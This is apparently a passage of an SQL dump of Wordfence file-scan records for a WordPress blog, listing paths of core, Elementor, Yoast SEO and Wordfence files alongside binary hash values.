('#bǦ����S~8Ǹ','wp-content/plugins/elementor/assets/lib/e-gallery/js/e-gallery.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/e-gallery/js/e-gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��̂�P[7>�n�6�v','�/H\'�w�\'�\'iEA��t@*�{�ʷ�\0d4C','',0,'?'),
('#t�n2����=�^V','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-permalink-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4x�%�\r\Z E�ꪹ','�]����f�&�t�WHokcEЁ�}���:�K','',0,'?'),
('#|F̉�%�������\Z','wp-content/plugins/wordpress-seo/src/routes/supported-features-route.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/routes/supported-features-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1`.9�>v4�0�V�Y�','8C\Zi{��z�Q,�Q#+��B/��d+q=*��\n3�','',0,'?'),
('#��pS�e9��_B�=','wp-content/plugins/elementor-pro/assets/css/widget-progress-tracker-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-progress-tracker-rtl.min.css',0,'K�\0QN;$(-���SN��','K�\0QN;$(-���SN��','���@q��rJW~%d��\"2�f���5�c#','',0,'?'),
('#�\\M��@�0���T�','wp-includes/blocks/post-excerpt/editor-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-excerpt/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �<��\r\'w9zR','O�FsoKL*�(\n�b�`�fNX�sSԚ�\\S�]','',0,'?'),
('#�-g�\\L%3�SB#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Z�l��o9͒����','��0 ��6�ӭ�Iv����hJ��`����','',0,'?'),
('#�)_�۱�Y����h}2','wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��r�+����','�sS\"��E!\"Y�w�)f��-��)?���̾ ','',0,'?'),
('#���Fǎ��E�r�:','wp-content/plugins/elementor/assets/css/widget-video-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-video-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��l��쎟�%�ט\"','=�kCP���[Ɇ�ƽ�A�_S���u��v|P��','',0,'?'),
('#��iU�f�����zhJF','wp-includes/sodium_compat/autoload-php7.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),
('#�t=�d%N�*Z�}g��','wp-content/uploads/2020/02/cropped-ictbank-1-150x150.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/cropped-ictbank-1-150x150.png',0,'w�Ry�[�w���6','w�Ry�[�w���6','ˈ��&��c�E,WB9�zy�c��>�ʃ���','',0,'?'),
('#�h!غ��C8�(��t','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/deprecation-contracts/function.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/deprecation-contracts/function.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z5k-���U+�R�.�','`��65�)�gD��i�!A���1v�Z��x����','',0,'?'),
('#�����^C���%��k�','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[D�g<.vܩH#k�SI','�v(��JG��D�W�_<3O63�m��\Z�','',0,'?'),
('$4X�e�\'Ф j�q�','wp-content/plugins/wordpress-seo/js/dist/how-to-block.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/how-to-block.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r$�Gp�.�(O',')j�[��\'\"K�R�������BNq!��','',0,'?'),
('$\Z���=\'�w@��u�','wp-content/plugins/elementor/core/page-assets/data-managers/font-icon-svg/e-icons.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/page-assets/data-managers/font-icon-svg/e-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�4 9S&v�','�=���0P��e�O�ⴤqk�n����y��','',0,'?'),
('$*t ��` ���ɲ�','wp-content/plugins/elementor-pro/assets/js/popup.1f90f6cfd0d44ef28772.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/popup.1f90f6cfd0d44ef28772.bundle.js',0,'u����9�(�!ܕ`�\Z�','u����9�(�!ܕ`�\Z�','y�-&w�\0���7;7��a_\'7�e�*���{N','',0,'?'),
('$.��\nQ��B��$ᒃ','wp-content/plugins/elementor-pro/modules/loop-filter/query/data/query-constants.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/loop-filter/query/data/query-constants.php',0,'#�Q�f��d�[��','#�Q�f��d�[��','��<ǰq���2� �iU���μ�6Ķ��`�','',0,'?'),
('$7y���]���N�','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͩ�pm��<�j@��\'','�Ċ8���,���Qw�G�n� a{���G9�D','',0,'?'),
('$[R��.B���@�','wp-content/plugins/elementor-pro/modules/slides/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/slides/module.php',0,'�&?�\'2�:�I�Q�ko�','�&?�\'2�:�I�Q�ko�','�O<�����ѱwX6�\r&���Z�BO���0>','',0,'?'),
('$tE�xO#7�j�{ ','wp-content/plugins/elementor/modules/admin-top-bar/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/admin-top-bar/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZY`�A�q��Xz�\n','��Sø�,?z8��0�\n1�F�7�R0�)r\"','',0,'?'),
('$�Z�tz��t�Wm','wp-content/plugins/elementor/includes/widgets/button.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/widgets/button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�}\'w��^�\n�','�}2xy�>b��7���Th����G]2�\n�','',0,'?'),
('$����0S\r�r���','wp-includes/images/smilies/icon_redface.gif','/var/www/html/ictbank/blog/wp-includes/images/smilies/icon_redface.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��M�0��je[��Y*','��]���4���\0�� �}��S/Ah��)�','',0,'?'),
('$��S�Ck��d�W�','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!��\"��V% |','�X>����[6_��\\��a�3�����s�V','',0,'?'),
('$��� ~</��aR�','wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ia ~P�V��D/\r�','�O�g§Ʉ��zX�J�Rf�yJ�Ŷ','',0,'?'),
('$���%\Z�d�Ͻ','wp-content/plugins/elementor/core/upgrade/custom-tasks-manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/upgrade/custom-tasks-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`BrBYH���\"�Z\r�','0u��\0T:����|��V�G1ާ��i��z`','',0,'?'),
('$���C����/�9��','wp-includes/class-wp.php','/var/www/html/ictbank/blog/wp-includes/class-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_����y��Ƃ� �','9$��;̛�*�\\��X�\'���\n.�8o�\n+�+!','',0,'?'),
('$��P���Xu�����','wp-content/plugins/wordpress-seo/inc/index.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','�� 蚠{�c�FJ�w��!}a���9�','',0,'?'),
('$�TGy\rA��W@��5','wp-content/plugins/elementor-pro/run-on-linux.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/run-on-linux.js',0,'�89����6X\\1�\Z�','�89����6X\\1�\Z�','�7�a���F6�$8u���\"N*�R�@�3�','',0,'?'),
('$��-#q`�l�$W�ۉ','wp-content/plugins/wordfence/lib/live_activity.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ik���s','^&�V�b��,��s��B^�R�4�Ѹ����V','',0,'?'),
('$��|��c�� \\~��','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^>�5�pa��W��>','���������DC��XG4WFP�#�N�S\Z','',0,'?'),
('$�CW�#��zn�L.�','wp-content/plugins/elementor/assets/js/common.min.js.LICENSE.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/common.min.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N4�e���;�z❝o','��%H(�K%��?���G�0[E�����','',0,'?'),
('$�GE�k�<[����','wp-content/plugins/wordpress-seo/src/integrations/watchers/auto-update-watcher.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/watchers/auto-update-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0*���0�-�zc<z�','�^��$A\n#��7�T���ZP���-���M','',0,'?'),
('$�\0�c�U�&�&�','wp-content/plugins/elementor-pro/assets/js/preview.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/preview.js',0,')\r�\r�9��wD�=R�',')\r�\r�9��wD�=R�','s��S�y���c�L���O�KQW {��C~���','',0,'?'),
('$��^���6bH^�*��','wp-admin/options-privacy.php','/var/www/html/ictbank/blog/wp-admin/options-privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ხ�0��1�����','�o7��H+�j�$^,���-��[/��N�UEؿ','',0,'?'),
('$��߰�R�\r��ab8!','wp-content/plugins/wordpress-seo/vendor/autoload.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fuP@c�J��K8� �','$�(7�7.=�Gu\Z&�� ���<�7x�]f�','',0,'?'),
('$�ϫ/����!��C�','wp-includes/IXR/class-IXR-introspectionserver.php','/var/www/html/ictbank/blog/wp-includes/IXR/class-IXR-introspectionserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ua�w�<�Iw�p�O7-','��\n���C����PEQ%�D\r�k*�X���o','',0,'?'),
('% n�\r3\Zޝ�:�E','wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-reports.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�\ZEɉ������','7��w��˴��#�%�����r�\rP��4���','',0,'?'),
('% ���ſ�kuX�b���','wp-includes/blocks/read-more.php','/var/www/html/ictbank/blog/wp-includes/blocks/read-more.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��]Z\"���y�Ґ','����=�\'���1]!<��/�vBS`ƛ�!�','',0,'?'),
('%�]M�3�T�1T��/','wp-includes/blocks/preformatted/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/preformatted/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��TĒ�+��E�^�g�[','�0(_�l\Z�̕�:�������;�J��!r�','',0,'?'),
('%����7��娳�','wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�b��������Z','S�\ZV��Z�DfGb���¸z���C�\Zb�>�','',0,'?'),
('%��Y� z�����','wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/hidden-portfolio-hero.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0I\"mm��Ǝ: �c','I�2�P�5�.�f��ë��lr�\rq���])r','',0,'?'),
('%f�Nvn9�,\r�W�','wp-includes/blocks/post-template/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/post-template/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','č�4�Uu�\nYi��','��&�s��h���o�@�v�\Z�f�z��=l���_K','',0,'?'),
('%$���M�q�T<��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��UO��\Zߠ�xtH','�G\n\"�_/A�g�h U?�S�s�H�ב�Y��ٳ','',0,'?'),
('%)�0�\Z���Me�^S','wp-content/plugins/elementor-pro/readme.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/readme.txt',0,'�r����o���VE~;�','�r����o���VE~;�','�13�HU:/�q1�\r���hJ\r>���Y]w�8�','',0,'?'),
('%.�.Ct�=����\\`','wp-includes/sodium_compat/src/Core/SipHash.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cJ>|Eqv0|bv�� ','ܟ�j�pe�M�N�?���a��Xi+!S�2','',0,'?'),
('%^���X�����o�','wp-content/plugins/elementor-pro/modules/woocommerce/conditions/product-search.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/conditions/product-search.php',0,'��9)s�d�. p�','��9)s�d�. p�','� c-�\"^�5�tm��\"(>1e�³�\'P2','',0,'?'),
('%ehV���\n�M\n�~','wp-content/plugins/elementor-pro/modules/display-conditions/classes/cache-notice.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/display-conditions/classes/cache-notice.php',0,'��3(?!=��z�@���','��3(?!=��z�@���','��CƋ1�f�~ ���M�-��[Us�\'��g��','',0,'?'),
('%i����gca�W�!q�','wp-includes/blocks/cover/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/cover/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','={i��\\fi �n-<��','����>��-�<��-�c�*�ȶ���Z�V���','',0,'?'),
('%sqm!��W���4','wp-content/plugins/elementor-pro/modules/custom-code/document.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/custom-code/document.php',0,'�`����c�^=D','�`����c�^=D','�n�ޓx\n�Џ\Z�D���=rP��K�X��o','',0,'?'),
('%��q�#��A���U��','wp-content/plugins/wordpress-seo/images/plugin_subscription.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/plugin_subscription.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����7�,�_p �','�o��盖�p�`�cR+ͽ�]<�\n�Pm�Z��','',0,'?'),
('%���V�Ћ]��=w','wp-content/plugins/wordpress-seo/admin/class-config.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/class-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/O-qv\"K �','=�\\���ŃPX�j���F�Ym�[�Ȳ(4��','',0,'?'),
('%���9��\\ދ�','wp-admin/includes/class-wp-site-health-auto-updates.php','/var/www/html/ictbank/blog/wp-admin/includes/class-wp-site-health-auto-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_��v6��fm��\'�','JF��s����]c\rˮ�Ϗ�\'\0ȩ�R-�]','',0,'?'),
('%��|�-���X�2`JV','wp-admin/images/about-texture.png','/var/www/html/ictbank/blog/wp-admin/images/about-texture.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�m{oQ����KU','J>�\\ˌk~2����r!��!�ti+�\0�','',0,'?'),
('%�B��q�IDJz�','wp-includes/html-api/class-wp-html-tag-processor.php','/var/www/html/ictbank/blog/wp-includes/html-api/class-wp-html-tag-processor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��s$�\\���q2','p�ysk?R5Y?Y��:\\��x-�\0�? !�\nD�','',0,'?'),
('%����8^�V<�t�','wp-admin/edit-tag-form.php','/var/www/html/ictbank/blog/wp-admin/edit-tag-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�6%���ݠ5�','�_�m��1�a�\'X#(VS�y���2�I��>|','',0,'?'),
('%�/(�[�}�|}�g�1','wp-content/plugins/elementor-pro/modules/forms/classes/integration-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/classes/integration-base.php',0,'};��j;M@��?���RR','};��j;M@��?���RR','MR��ƊGѩ��.c��>�S,�R%F��','',0,'?'),
('%�fW��� �P0�}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"� +h\"Fb��','',0,'?'),
('%ħ���ʗk�|o�','wp-content/plugins/wordfence/css/fullLog.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/fullLog.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�.i�`���U�v','?�>��?h�ξ[�²�P�u�{�pu�a����a','',0,'?'),
('%��Q&�f�N���B\'�','wp-content/plugins/duplicate-page/languages/duplicate-page-de_DE_formal.po','/var/www/html/ictbank/blog/wp-content/plugins/duplicate-page/languages/duplicate-page-de_DE_formal.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�c~�x�S�\Z�Zq��','A\"^%dF\\S`�y݈So��d?�F�)q�5','',0,'?'),
('%�Pb.��8�Gd�t�','wp-admin/css/media.min.css','/var/www/html/ictbank/blog/wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[ў�!�5�hl','��%�e��L�%�]��m]�d����$�)','',0,'?'),
('%����҈�wA&�0','wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/MessageFormatter.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/MessageFormatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�|]��\Z�d��e�','FL��ϕ$�Z�^�����,�݊YwK�','',0,'?'),
('%���µ����lk{ ','wp-content/plugins/wordpress-seo/src/editors/domain/seo/social.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/editors/domain/seo/social.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D`┦%\n�w_�','!|�Tr�Z � �~�T�v��EeG���8','',0,'?'),
('%p�C����u@Q�','wp-content/plugins/elementor/core/logger/loggers/logger-interface.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/logger/loggers/logger-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0ד��L\rD���aև','_�?��N��)\"�^J�+�\'���L0=�b���<2','',0,'?'),
('%���](2te��(�`K','wp-content/plugins/wordpress-seo/src/models/primary-term.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/models/primary-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�����fP,�!�','Y��Г҂`�Q�$6G���OcWYGJ��/','',0,'?'),
('&8Hӧ�+Xzi\n�','wp-content/plugins/wordpress-seo/js/dist/languages/tr.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/languages/tr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-{���+O-�','�o�Ӌ_�,�9J�,Ѻp\'_\\�z��Uɛ','',0,'?'),
('&�\'�`w��ƚ���','wp-includes/js/dist/patterns.js','/var/www/html/ictbank/blog/wp-includes/js/dist/patterns.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ND�\'�b^鮚y�Kw>�','���,��յ�[�1K��6���v�����Q�[3�','',0,'?'),
('&3��9Q&m��Oc�Q','wp-includes/blocks/post-template.php','/var/www/html/ictbank/blog/wp-includes/blocks/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�Y�E��y=���','��Fj�Td��X�r��\\���?tR��q��','',0,'?'),
('&PDt�?5u�1Ym��','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xy�~�X�����C�','�B�����:z��ʉ̂DPڒ��l�\Z��-|','',0,'?'),
('&���|�0��Ԧ��Z�','wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~�� ��sL%����b','��o�E�`2�@\0��DA+�� �c)���!�^','',0,'?'),
('&*���dĆָ� �H5','wp-admin/images/align-center.png','/var/www/html/ictbank/blog/wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �\Zݶ�4y�dY1�e�','�놽N3�X!��lj�h`�����hA]�J�','',0,'?'),
('&+�=��Fi�(���䲸','wp-content/plugins/wordpress-seo/css/dist/adminbar-2320-rtl.css','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/css/dist/adminbar-2320-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޝh�s�a������','L�o��ܛ�U�=z���NC7xC$~���m','',0,'?'),
('&4���p( ��O�e','wp-content/uploads/2021/05/1400-02-02-12.02.51-280x180.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-280x180.jpg',0,'1� q��8X&�Z���s','1� q��8X&�Z���s','Ӽ�x�8YTo�ί�}W�,���_����3�','',0,'?'),
('&=\Z�+t�\"�/k\'\n','wp-includes/js/jquery/jquery.form.min.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/jquery.form.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@f4�-|9Y��','�2�M?k����U�����by${�PbV��!','',0,'?'),
('&?�i�=:���|�n�','wp-content/uploads/2020/02/ictbank2-768x333.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/ictbank2-768x333.png',0,'\rX�g��V�.���','\rX�g��V�.���','w�;���N��[˦n�f�9��h��K����','',0,'?'),
('&A�_����f����u�','wp-content/plugins/elementor-pro/assets/css/editor.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/editor.css',0,'�yK)�u���r�','�yK)�u���r�','����`\n�\'\nx�x7hX.$�^���uY�.�\'�','',0,'?'),
('&MDf�U�ɋ���(�','wp-content/plugins/wordpress-seo/src/editors/framework/site/base-site-information.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/editors/framework/site/base-site-information.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V/1��Qj��',';�ht���n�e)CH��z������}�A�\"','',0,'?'),
('&ee�\n3K���vZ��','wp-admin/ms-delete-site.php','/var/www/html/ictbank/blog/wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�O��L�*p�>[�','<�c~�|�Ι����`�z�g��T�l�e�NϾ�>�','',0,'?'),
('&jl\"�9#�ꮛ�N�b','wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/text-feature-grid-3-col.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f#r���]�[\r|��','�3�@�Q]��9�\\��� b�d�.��y�ɂ','',0,'?'),
('&k\0v_fcb��v�����','wp-includes/js/dist/format-library.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/format-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�j\\\"m;I�Ԗo�1�','�Iqsc�榷��տC�o�K���[(@�F','',0,'?'),
('&s�R������X�<��','wp-includes/blocks/separator/theme.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/separator/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EO�c���m��{��','�/`i-^�3җ;�B��T�;����#\0�r�}:j','',0,'?'),
('&t!0^g��bJ�c,>3','wp-admin/upload.php','/var/www/html/ictbank/blog/wp-admin/upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�)�ҧ����\'P�','�@\"�3�l\0`#���*�l�uQ��*lM��7Oq','',0,'?'),
('&x�mf�{�$���!]�','wp-content/plugins/elementor/app/modules/import-export/runners/revert/site-settings.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/import-export/runners/revert/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ei��=IXS�An���','?�C��\Zh��V\0�4n~EI+9丶�l�o��','',0,'?'),
('&~�*m�E+nX�%;[O�','wp-includes/css/dist/block-library/common-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/css/dist/block-library/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P}��=t�ڇ����n>','���{ ���s\0{�ӥ��\\�+4��4�\0��','',0,'?'),
('&D���Q�R��w�]','wp-includes/sodium_compat/src/Core/ChaCha20.php','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),
('&��W�d�/s�os��','wp-content/plugins/duplicate-page/languages/duplicate-page.pot','/var/www/html/ictbank/blog/wp-content/plugins/duplicate-page/languages/duplicate-page.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~I�\"�*��1{�!�','�hj�C��I�ސ���3�(��l�z]����','',0,'?'),
('&��굟\Z<��Q���&','wp-content/plugins/elementor-pro/assets/js/media-carousel.aca2224ef13e6f999011.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/media-carousel.aca2224ef13e6f999011.bundle.min.js',0,'�]vmM9\\\rOC�E��','�]vmM9\\\rOC�E��','��T�`Y��xZA����������y#','',0,'?'),
('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php','/var/www/html/ictbank/blog/wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2��z;/Ï$m�','����x �2��E�����Z����μ','',0,'?'),
('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),
('&����ȑf�9h��o','wp-content/plugins/elementor-pro/modules/loop-filter/query/interfaces/query-interface.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/loop-filter/query/interfaces/query-interface.php',0,'����ˊS�g�}/','����ˊS�g�}/','��e����Mv�㟈o�f\"�`���G','',0,'?'),
('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php','/var/www/html/ictbank/blog/wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"m4Tͧ���S��','4X��@����/�9ܒ���fJ�\"�;^��]','',0,'?'),
('&��� P�shcusS','wp-content/wflogs/attack-data.php','/var/www/html/ictbank/blog/wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),
('&�/�乫n��\Z�','wp-content/plugins/elementor-pro/modules/notes/database/migrations/add-note-position.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/notes/database/migrations/add-note-position.php',0,'�G7\" ��t�kVf','�G7\" ��t�kVf','\Z��A�1I���D :6xv�c�1�BS\'�6��','',0,'?'),
